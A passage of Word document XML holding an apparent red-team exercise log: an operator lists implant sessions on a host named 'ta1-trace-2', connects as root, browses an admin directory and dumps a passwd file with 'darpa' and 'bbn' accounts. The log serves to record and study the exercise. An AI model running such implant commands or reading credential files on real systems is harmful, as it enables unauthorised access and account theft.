    <w:p w14:paraId="7C24B22C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D44B1B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39520DDF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEAED4B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L2        128.55.12.167:54140 --&gt;   128.55.12.167:8105  [HTTP]  Tue May 14 10:21:25 2019        active 34s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9E2273" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L1        128.55.12.167:54136 --&gt;   128.55.12.167:8105  [HTTP]  Tue May 14 10:18:22 2019        active 217s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339C6534" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E3440D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B65720" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con L2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C394D81" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L2&gt;getpid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5F1067" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] pid: 16808</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3304FE49" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L2&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619BF934" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uid: 0 root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B4330E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="171780E5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB89EBD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L2&gt;main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AEB8C9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF3E83C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L2        128.55.12.167:54140 --&gt;   128.55.12.167:8105  [HTTP]  Tue May 14 10:21:25 2019        active 173s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41213152" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L1        128.55.12.167:54136 --&gt;   128.55.12.167:8105  [HTTP]  Tue May 14 10:18:22 2019        active 356s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316DE371" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con L1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBB38EB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C838B87" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8C930F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L2        128.55.12.167:54140 --&gt;   128.55.12.167:8105  [HTTP]  Tue May 14 10:21:25 2019        active 179s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F27833" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L1        128.55.12.167:54136 --&gt;   128.55.12.167:8105  [HTTP]  Tue May 14 10:18:22 2019        DEAD 360s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F9F687" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04733CCA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EFB725" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E51F543" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L2        128.55.12.167:54140 --&gt;   128.55.12.167:8105  [HTTP]  Tue May 14 10:21:25 2019        active 415s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193AD79F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L1        128.55.12.167:54136 --&gt;   128.55.12.167:8105  [HTTP]  Tue May 14 10:18:22 2019        DEAD 360s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016E9ECB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BCE95C9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F54F0CD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A6B0F7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>11:44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDFD6AC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3B6C09" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L2        128.55.12.167:54140 --&gt;   128.55.12.167:8105  [HTTP]  Tue May 14 10:21:25 2019        active 4997s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AC7029" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L1        128.55.12.167:54136 --&gt;   128.55.12.167:8105  [HTTP]  Tue May 14 10:18:22 2019        DEAD 360s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33579509" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41FD4054" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B99A9FD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:r>
        <w:t>20190517 (Cont)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411B0FB9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46370A9E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489F2424" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L2        128.55.12.167:54140 --&gt;   128.55.12.167:8105  [HTTP]  Tue May 14 10:21:25 2019        active 271089s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3A63A1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L1        128.55.12.167:54136 --&gt;   128.55.12.167:8105  [HTTP]  Tue May 14 10:18:22 2019        DEAD 360s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070CD635" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con L2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12826402" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L2&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F434F69" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uid: 0 root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444A28D7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L2&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0D94B2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta1-trace-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600E73A3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L2&gt;pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2577218A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664E5F22" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L2&gt;cd home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A47770" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L2&gt;cd admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B86E698" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L2&gt;ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71492610" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] refload_pInfo_log (oops!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4633A4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] refload_pStageMem_log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0637EFED" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AFC064E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218AA273" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L2&gt;cat passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E86CD86" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] # $FreeBSD$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74876CE9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6A21AE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root:*:0:0:Charlie &amp;:/root:/bin/csh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249ACD94" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>toor:*:0:0:Bourne-again Superuser:/root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CD7789" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226FBBA2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>operator:*:2:5:System &amp;:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337DE8CE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0058EE19" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB2DE97" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1238D2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591AC327" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>news:*:8:8:News Subsystem:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BD9A76" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDBA543" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5FFA0A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0857D5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571E4624" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F75C305" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C77EE5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375BD622" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5932A001" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06313569" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DAB7F7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D048C2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768425FF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B29A94" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ntpd:*:123:123:NTP Daemon:/var/db/ntp:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE0EBD1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC398C6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C8DAB1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397A8E65" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>darpa:*:1001:1001:DARPA:/home/darpa:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB58738" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bbn:*:1002:1002:bbn:/home/bbn:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2811309C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36828C2A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494809A3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA69F02" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722F0609" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>polkitd:*:565:565:Polkit Daemon User:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11078048" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
